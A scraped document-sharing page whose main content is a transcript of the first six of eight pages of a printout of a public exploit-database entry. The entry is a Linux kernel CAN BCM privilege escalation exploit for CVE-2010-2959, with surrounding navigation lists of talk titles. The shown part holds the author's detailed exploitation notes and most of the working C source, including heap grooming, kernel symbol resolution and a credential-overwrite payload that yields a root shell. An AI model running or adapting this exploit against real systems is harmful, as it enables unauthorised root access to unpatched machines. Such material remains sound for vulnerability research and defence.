BKK16-211 Internet of Tiny Linux (io tl)- Status and ProgressBKK16-211 Internet of Tiny Linux (io tl)- Status and Progress
BKK16-211 Internet of Tiny Linux (io tl)- Status and Progress
 
Genode Compositions
Genode CompositionsGenode Compositions
Genode Compositions
 
Auditing the Opensource Kernels
Auditing the Opensource KernelsAuditing the Opensource Kernels
Auditing the Opensource Kernels
 
Exploiting Llinux Environment
Exploiting Llinux EnvironmentExploiting Llinux Environment
Exploiting Llinux Environment
 
Beagleboard xm-setup
Beagleboard xm-setupBeagleboard xm-setup
Beagleboard xm-setup
 
Summary of linux kernel security protections
Summary of linux kernel security protectionsSummary of linux kernel security protections
Summary of linux kernel security protections
 
Linux kernel debugging
Linux kernel debuggingLinux kernel debugging
Linux kernel debugging
 
Le Device Tree Linux
Le Device Tree LinuxLe Device Tree Linux
Le Device Tree Linux
 
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbersDefcon 22 - Stitching numbers - generating rop payloads from in memory numbers
Defcon 22 - Stitching numbers - generating rop payloads from in memory numbers
 
Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#
 
Kernel Recipes 2015 - Kernel dump analysis
Kernel Recipes 2015 - Kernel dump analysisKernel Recipes 2015 - Kernel dump analysis
Kernel Recipes 2015 - Kernel dump analysis
 
Let's trace Linux Lernel with KGDB @ COSCUP 2021
Let's trace Linux Lernel with KGDB @ COSCUP 2021Let's trace Linux Lernel with KGDB @ COSCUP 2021
Let's trace Linux Lernel with KGDB @ COSCUP 2021
 
Attack your Trusted Core
Attack your Trusted CoreAttack your Trusted Core
Attack your Trusted Core
 
Sockets and Socket-Buffer
Sockets and Socket-BufferSockets and Socket-Buffer
Sockets and Socket-Buffer
 
ARM® Cortex™ M Bootup_CMSIS_Part_2_3
ARM® Cortex™ M Bootup_CMSIS_Part_2_3ARM® Cortex™ M Bootup_CMSIS_Part_2_3
ARM® Cortex™ M Bootup_CMSIS_Part_2_3
 
OMFW 2012: Analyzing Linux Kernel Rootkits with Volatlity
OMFW 2012: Analyzing Linux Kernel Rootkits with VolatlityOMFW 2012: Analyzing Linux Kernel Rootkits with Volatlity
OMFW 2012: Analyzing Linux Kernel Rootkits with Volatlity
 
Intel® RDT Hands-on Lab
Intel® RDT Hands-on LabIntel® RDT Hands-on Lab
Intel® RDT Hands-on Lab
 

Más de Carlos Eduardo

Criando plugin para o Nagios em Shell Script _ Nagios
Criando plugin para o Nagios em Shell Script _ NagiosCriando plugin para o Nagios em Shell Script _ Nagios
Criando plugin para o Nagios em Shell Script _ NagiosCarlos Eduardo
 
Iptables bridging and firewalling
Iptables bridging and firewallingIptables bridging and firewalling
Iptables bridging and firewallingCarlos Eduardo
 
Alterar nome do_domínio–rendom_win-2008_e_2003
Alterar nome do_domínio–rendom_win-2008_e_2003Alterar nome do_domínio–rendom_win-2008_e_2003
Alterar nome do_domínio–rendom_win-2008_e_2003Carlos Eduardo
 
Configuração dns memorial descritivo
Configuração dns memorial descritivoConfiguração dns memorial descritivo
Configuração dns memorial descritivoCarlos Eduardo
 
Additional resources repositories_rpm_forge - centos wiki
Additional resources repositories_rpm_forge - centos wikiAdditional resources repositories_rpm_forge - centos wiki
Additional resources repositories_rpm_forge - centos wikiCarlos Eduardo
 
Postfix amavisd connect to 127.0.0.1[127.0.0.1]-10024_ connection refused _...
Postfix amavisd connect to 127.0.0.1[127.0.0.1]-10024_ connection refused _...Postfix amavisd connect to 127.0.0.1[127.0.0.1]-10024_ connection refused _...
Postfix amavisd connect to 127.0.0.1[127.0.0.1]-10024_ connection refused _...Carlos Eduardo
 
Migrate linux user password to postfix vmail database
Migrate linux user password to postfix vmail databaseMigrate linux user password to postfix vmail database
Migrate linux user password to postfix vmail databaseCarlos Eduardo
 
Poppassd setup howto for rhel cent os 5 ‹‹ linux mail server setup and howto ...
Poppassd setup howto for rhel cent os 5 ‹‹ linux mail server setup and howto ...Poppassd setup howto for rhel cent os 5 ‹‹ linux mail server setup and howto ...
Poppassd setup howto for rhel cent os 5 ‹‹ linux mail server setup and howto ...Carlos Eduardo
 
Samsung r440 com wireless broadcom bcm4313 no ubuntu 11.10
Samsung r440 com wireless broadcom bcm4313 no ubuntu 11.10Samsung r440 com wireless broadcom bcm4313 no ubuntu 11.10
Samsung r440 com wireless broadcom bcm4313 no ubuntu 11.10Carlos Eduardo
 
How to root phones or tablets running android 2.3 gingerbread jailbreak an...
How to root phones or tablets running android 2.3 gingerbread jailbreak an...How to root phones or tablets running android 2.3 gingerbread jailbreak an...
How to root phones or tablets running android 2.3 gingerbread jailbreak an...Carlos Eduardo
 
Compartilhamento no samba com permissão de grupo
Compartilhamento no samba com permissão de grupoCompartilhamento no samba com permissão de grupo
Compartilhamento no samba com permissão de grupoCarlos Eduardo
 
Converting parallels or vm ware to virtual box
Converting parallels or vm ware to virtual boxConverting parallels or vm ware to virtual box
Converting parallels or vm ware to virtual boxCarlos Eduardo
 
Startup guide for kvm on cent os 6
Startup guide for kvm on cent os 6Startup guide for kvm on cent os 6
Startup guide for kvm on cent os 6Carlos Eduardo
 
Alterar memória kvm virtual machine
Alterar memória kvm virtual machineAlterar memória kvm virtual machine
Alterar memória kvm virtual machineCarlos Eduardo
 
Instalando e configurando o serviço snmpd no red hat 5.3 cent_os
Instalando e configurando o serviço snmpd no red hat 5.3 cent_osInstalando e configurando o serviço snmpd no red hat 5.3 cent_os
Instalando e configurando o serviço snmpd no red hat 5.3 cent_osCarlos Eduardo
 

Más de Carlos Eduardo (20)

Criando plugin para o Nagios em Shell Script _ Nagios
Criando plugin para o Nagios em Shell Script _ NagiosCriando plugin para o Nagios em Shell Script _ Nagios
Criando plugin para o Nagios em Shell Script _ Nagios
 
Iptables bridging and firewalling
Iptables bridging and firewallingIptables bridging and firewalling
Iptables bridging and firewalling
 
Alterar nome do_domínio–rendom_win-2008_e_2003
Alterar nome do_domínio–rendom_win-2008_e_2003Alterar nome do_domínio–rendom_win-2008_e_2003
Alterar nome do_domínio–rendom_win-2008_e_2003
 
Configuração dns memorial descritivo
Configuração dns memorial descritivoConfiguração dns memorial descritivo
Configuração dns memorial descritivo
 
Additional resources repositories_rpm_forge - centos wiki
Additional resources repositories_rpm_forge - centos wikiAdditional resources repositories_rpm_forge - centos wiki
Additional resources repositories_rpm_forge - centos wiki
 
Postfix amavisd connect to 127.0.0.1[127.0.0.1]-10024_ connection refused _...
Postfix amavisd connect to 127.0.0.1[127.0.0.1]-10024_ connection refused _...Postfix amavisd connect to 127.0.0.1[127.0.0.1]-10024_ connection refused _...
Postfix amavisd connect to 127.0.0.1[127.0.0.1]-10024_ connection refused _...
 
Migrate linux user password to postfix vmail database
Migrate linux user password to postfix vmail databaseMigrate linux user password to postfix vmail database
Migrate linux user password to postfix vmail database
 
Poppassd setup howto for rhel cent os 5 ‹‹ linux mail server setup and howto ...
Poppassd setup howto for rhel cent os 5 ‹‹ linux mail server setup and howto ...Poppassd setup howto for rhel cent os 5 ‹‹ linux mail server setup and howto ...
Poppassd setup howto for rhel cent os 5 ‹‹ linux mail server setup and howto ...
 
Samsung r440 com wireless broadcom bcm4313 no ubuntu 11.10
Samsung r440 com wireless broadcom bcm4313 no ubuntu 11.10Samsung r440 com wireless broadcom bcm4313 no ubuntu 11.10
Samsung r440 com wireless broadcom bcm4313 no ubuntu 11.10
 
How to root phones or tablets running android 2.3 gingerbread jailbreak an...
How to root phones or tablets running android 2.3 gingerbread jailbreak an...How to root phones or tablets running android 2.3 gingerbread jailbreak an...
How to root phones or tablets running android 2.3 gingerbread jailbreak an...
 
Compartilhamento no samba com permissão de grupo
Compartilhamento no samba com permissão de grupoCompartilhamento no samba com permissão de grupo
Compartilhamento no samba com permissão de grupo
 
Canivete shell
Canivete shellCanivete shell
Canivete shell
 
Lsof
LsofLsof
Lsof
 
Converting parallels or vm ware to virtual box
Converting parallels or vm ware to virtual boxConverting parallels or vm ware to virtual box
Converting parallels or vm ware to virtual box
 
Startup guide for kvm on cent os 6
Startup guide for kvm on cent os 6Startup guide for kvm on cent os 6
Startup guide for kvm on cent os 6
 
Alterar memória kvm virtual machine
Alterar memória kvm virtual machineAlterar memória kvm virtual machine
Alterar memória kvm virtual machine
 
Comando kvm terminal
Comando kvm terminalComando kvm terminal
Comando kvm terminal
 
Instalação geo ip
Instalação geo ipInstalação geo ip
Instalação geo ip
 
Otimizando seu Squid
Otimizando seu SquidOtimizando seu Squid
Otimizando seu Squid
 
Instalando e configurando o serviço snmpd no red hat 5.3 cent_os
Instalando e configurando o serviço snmpd no red hat 5.3 cent_osInstalando e configurando o serviço snmpd no red hat 5.3 cent_os
Instalando e configurando o serviço snmpd no red hat 5.3 cent_os
 

Último

Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...panagenda
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...AliaaTarek5
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Alkin Tezuysal
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Hiroshi SHIBATA
 
Manual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance AuditManual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance AuditSkynet Technologies
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Mark Goldstein
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfpanagenda
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...Wes McKinney
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI AgeCprime
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterMydbops
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfIngrid Airi González
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 

Último (20)

Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
Why device, WIFI, and ISP insights are crucial to supporting remote Microsoft...
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 
Manual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance AuditManual 508 Accessibility Compliance Audit
Manual 508 Accessibility Compliance Audit
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI Age
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL Router
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdf
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 

Exploit access root to kernel 2.6.32 2.6.36 privilege escalation exploit

  • 1. Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit http://www.exploit-db.com/exploits/14814/ Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit EDB-ID: 14814 CVE: 2010-2959 OSVDB-ID: N/A Rating Overall: Author: Jon Oberheide Published: 2010-08-27 Verified: 1 2 Exploit Code: Vulnerable App: N/A 3 4 5 (5.0) view source print? /* * i-CAN-haz-MODHARDEN.c * * Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit * Jon Oberheide <jon@oberheide.org> * http://jon.oberheide.org * * Information: * * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2959 * * Ben Hawkes discovered an integer overflow in the Controller Area Network * (CAN) subsystem when setting up frame content and filtering certain * messages. An attacker could send specially crafted CAN traffic to crash * the system or gain root privileges. * * Usage: * * $ gcc i-can-haz-modharden.c -o i-can-haz-modharden * $ ./i-can-haz-modharden * ... * [+] launching root shell! * # id * uid=0(root) gid=0(root) * * Notes: * * The allocation pattern of the CAN BCM module gives us some desirable * properties for smashing the SLUB. We control the kmalloc with a 16-byte * granularity allowing us to place our allocation in the SLUB cache of our * choosing (we'll use kmalloc-96 and smash a shmid_kernel struct for * old-times sake). The allocation can also be made in its own discrete * stage before the overwrite which allows us to be a bit more conservative * in ensuring the proper layout of our SLUB cache. * * To exploit the vulnerability, we first create a BCM RX op with a crafted * nframes to trigger the integer overflow during the kmalloc. On the second * call to update the existing RX op, we bypass the E2BIG check since the * stored nframes in the op is large, yet has an insufficiently sized * allocation associated with it. We then have a controlled write into the * adjacent shmid_kernel object in the 96-byte SLUB cache. * * However, while we control the length of the SLUB overwrite via a * memcpy_fromiovec operation, there exists a memset operation that directly * follows which zeros out last_frames, likely an adjacent allocation, with * the same malformed length, effectively nullifying our shmid smash. To * work around this, we take advantage of the fact that copy_from_user can * perform partial writes on x86 and trigger an EFAULT by setting up a * truncated memory mapping as the source for the memcpy_fromiovec operation, * allowing us to smash the necessary amount of memory and then pop out and * return early before the memset operation occurs. * * We then perform a dry-run and detect the shmid smash via an EIDRM errno * from shmat() caused by an invalid ipc_perm sequence number. Once we're * sure we have a shmid_kernel under our control we re-smash it with the * malformed version and redirect control flow to our credential modifying * calls mapped in user space. * * Distros: please use grsecurity's MODHARDEN or SELinux's module_request * to restrict unprivileged loading of uncommon packet families. Allowing 1 de 8 17/2/2012 14:55
  • 2. Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit http://www.exploit-db.com/exploits/14814/ * the loading of poorly-written PF modules just adds a non-trivial and * unnecessary attack surface to the kernel. * * Targeted for 32-bit Ubuntu Lucid 10.04 (2.6.32-21-generic), but ports * easily to other vulnerable kernels/distros. Careful, it could use some * post-exploitation stability love as well. * * Props to twiz, sgrakkyu, spender, qaaz, and anyone else I missed that * this exploit borrows code from. */ #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <string.h> #include <unistd.h> #include <errno.h> #include <fcntl.h> #include <limits.h> #include <inttypes.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/ipc.h> #include <sys/shm.h> #include <sys/mman.h> #include <sys/stat.h> #define SLUB "kmalloc-96" #define ALLOCATION 96 #define FILLER 100 #ifndef PF_CAN #define PF_CAN 29 #endif #ifndef CAN_BCM #define CAN_BCM 2 #endif struct sockaddr_can { sa_family_t can_family; int can_ifindex; union { struct { uint32_t rx_id, tx_id; } tp; } can_addr; }; struct can_frame { uint32_t can_id; uint8_t can_dlc; uint8_t data[8] __attribute__((aligned(8))); }; struct bcm_msg_head { uint32_t opcode; uint32_t flags; uint32_t count; struct timeval ival1, ival2; uint32_t can_id; uint32_t nframes; struct can_frame frames[0]; }; #define RX_SETUP 5 #define RX_DELETE 6 #define CFSIZ sizeof(struct can_frame) #define MHSIZ sizeof(struct bcm_msg_head) #define IPCMNI 32768 #define EIDRM 43 #define HDRLEN_KMALLOC 8 struct list_head { struct list_head *next; struct list_head *prev; }; struct super_block { struct list_head s_list; unsigned int s_dev; unsigned long s_blocksize; unsigned char s_blocksize_bits; unsigned char s_dirt; uint64_t s_maxbytes; void *s_type; void *s_op; 2 de 8 17/2/2012 14:55
  • 3. Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit http://www.exploit-db.com/exploits/14814/ void *dq_op; void *s_qcop; void *s_export_op; unsigned long s_flags; } super_block; struct mutex { unsigned int count; unsigned int wait_lock; struct list_head wait_list; void *owner; }; struct inode { struct list_head i_hash; struct list_head i_list; struct list_head i_sb_list; struct list_head i_dentry_list; unsigned long i_ino; unsigned int i_count; unsigned int i_nlink; unsigned int i_uid; unsigned int i_gid; unsigned int i_rdev; uint64_t i_version; uint64_t i_size; unsigned int i_size_seqcount; long i_atime_tv_sec; long i_atime_tv_nsec; long i_mtime_tv_sec; long i_mtime_tv_nsec; long i_ctime_tv_sec; long i_ctime_tv_nsec; uint64_t i_blocks; unsigned int i_blkbits; unsigned short i_bytes; unsigned short i_mode; unsigned int i_lock; struct mutex i_mutex; unsigned int i_alloc_sem_activity; unsigned int i_alloc_sem_wait_lock; struct list_head i_alloc_sem_wait_list; void *i_op; void *i_fop; struct super_block *i_sb; void *i_flock; void *i_mapping; char i_data[84]; void *i_dquot_1; void *i_dquot_2; struct list_head i_devices; void *i_pipe_union; unsigned int i_generation; unsigned int i_fsnotify_mask; void *i_fsnotify_mark_entries; struct list_head inotify_watches; struct mutex inotify_mutex; } inode; struct dentry { unsigned int d_count; unsigned int d_flags; unsigned int d_lock; int d_mounted; void *d_inode; struct list_head d_hash; void *d_parent; } dentry; struct file_operations { void *owner; void *llseek; void *read; void *write; void *aio_read; void *aio_write; void *readdir; 3 de 8 17/2/2012 14:55
  • 4. Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit http://www.exploit-db.com/exploits/14814/ void *poll; void *ioctl; void *unlocked_ioctl; void *compat_ioctl; void *mmap; void *open; void *flush; void *release; void *fsync; void *aio_fsync; void *fasync; void *lock; void *sendpage; void *get_unmapped_area; void *check_flags; void *flock; void *splice_write; void *splice_read; void *setlease; } op; struct vfsmount { struct list_head mnt_hash; void *mnt_parent; void *mnt_mountpoint; void *mnt_root; void *mnt_sb; struct list_head mnt_mounts; struct list_head mnt_child; int mnt_flags; const char *mnt_devname; struct list_head mnt_list; struct list_head mnt_expire; struct list_head mnt_share; struct list_head mnt_slave_list; struct list_head mnt_slave; struct vfsmount *mnt_master; struct mnt_namespace *mnt_ns; int mnt_id; int mnt_group_id; int mnt_count; } vfsmount; struct file { struct list_head fu_list; struct vfsmount *f_vfsmnt; struct dentry *f_dentry; void *f_op; unsigned int f_lock; unsigned long f_count; } file; struct kern_ipc_perm { unsigned int lock; int deleted; int id; unsigned int key; unsigned int uid; unsigned int gid; unsigned int cuid; unsigned int cgid; unsigned int mode; unsigned int seq; void *security; }; struct shmid_kernel { struct kern_ipc_perm shm_perm; struct file *shm_file; unsigned long shm_nattch; unsigned long shm_segsz; time_t shm_atim; time_t shm_dtim; time_t shm_ctim; unsigned int shm_cprid; unsigned int shm_lprid; void *mlock_user; 4 de 8 17/2/2012 14:55
  • 5. Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit http://www.exploit-db.com/exploits/14814/ } shmid_kernel; typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; int __attribute__((regparm(3))) kernel_code(struct file *file, void *vma) { commit_creds(prepare_kernel_cred(0)); return -1; } unsigned long get_symbol(char *name) { FILE *f; unsigned long addr; char dummy; char sname[512]; int ret = 0, oldstyle; f = fopen("/proc/kallsyms", "r"); if (f == NULL) { f = fopen("/proc/ksyms", "r"); if (f == NULL) return 0; oldstyle = 1; } while (ret != EOF) { if (!oldstyle) { ret = fscanf(f, "%p %c %sn", (void **) &addr, &dummy, sname); } else { ret = fscanf(f, "%p %sn", (void **) &addr, sname); if (ret == 2) { char *p; if (strstr(sname, "_O/") || strstr(sname, "_S.")) { continue; } p = strrchr(sname, '_'); if (p > ((char *) sname + 5) && !strncmp(p - 3, "smp", 3)) { p = p - 4; while (p > (char *)sname && *(p - 1) == '_') { p--; } *p = '0'; } } } if (ret == 0) { fscanf(f, "%sn", sname); continue; } if (!strcmp(name, sname)) { printf("[+] resolved symbol %s to %pn", name, (void *) addr); fclose(f); return addr; } } fclose(f); return 0; } int check_slabinfo(char *cache, int *active_out, int *total_out) { FILE *fp; char name[64], slab[256]; int active, total, diff; memset(slab, 0, sizeof(slab)); memset(name, 0, sizeof(name)); fp = fopen("/proc/slabinfo", "r"); if (!fp) { printf("[-] sorry, /proc/slabinfo is not available!"); exit(1); } fgets(slab, sizeof(slab) - 1, fp); while (1) { 5 de 8 17/2/2012 14:55
  • 6. Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit http://www.exploit-db.com/exploits/14814/ fgets(slab, sizeof(slab) - 1, fp); sscanf(slab, "%s %u %u", name, &active, &total); diff = total - active; if (strcmp(name, cache) == 0) { break; } } fclose(fp); if (active_out) { *active_out = active; } if (total_out) { *total_out = total; } return diff; } void trigger(void) { int *shmids; int i, ret, sock, cnt, base, smashed; int diff, active, total, active_new, total_new; int len, sock_len, mmap_len; struct sockaddr_can addr; struct bcm_msg_head *msg; void *efault; char *buf; printf("[+] creating PF_CAN socket...n"); sock = socket(PF_CAN, SOCK_DGRAM, CAN_BCM); if (sock < 0) { printf("[-] kernel lacks CAN packet family supportn"); exit(1); } printf("[+] connecting PF_CAN socket...n"); memset(&addr, 0, sizeof(addr)); addr.can_family = PF_CAN; ret = connect(sock, (struct sockaddr *) &addr, sizeof(addr)); if (sock < 0) { printf("[-] could not connect CAN socketn"); exit(1); } len = MHSIZ + (CFSIZ * (ALLOCATION / 16)); msg = malloc(len); memset(msg, 0, len); msg->can_id = 2959; msg->nframes = (UINT_MAX / CFSIZ) + (ALLOCATION / 16) + 1; printf("[+] clearing out any active OPs via RX_DELETE...n"); msg->opcode = RX_DELETE; ret = send(sock, msg, len, 0); printf("[+] removing any active user-owned shmids...n"); system("for shmid in `cat /proc/sysvipc/shm | awk '{print $2}'`; do ipcrm -m $shmid > /dev/null 2>&1; done;"); printf("[+] massaging " SLUB " SLUB cache with dummy allocationsn"); diff = check_slabinfo(SLUB, &active, &total); shmids = malloc(sizeof(int) * diff * 10); cnt = diff * 10; for (i = 0; i < cnt; ++i) { diff = check_slabinfo(SLUB, &active, &total); if (diff == 0) { break; } shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT); } base = i; if (diff != 0) { printf("[-] inconsistency detected with SLUB cache allocation, please try againn"); exit(1); } printf("[+] corrupting BCM OP with truncated allocation via RX_SETUP...n"); i = base; cnt = i + FILLER; for (; i < cnt; ++i) { shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT); } msg->opcode = RX_SETUP; ret = send(sock, msg, len, 0); 6 de 8 17/2/2012 14:55
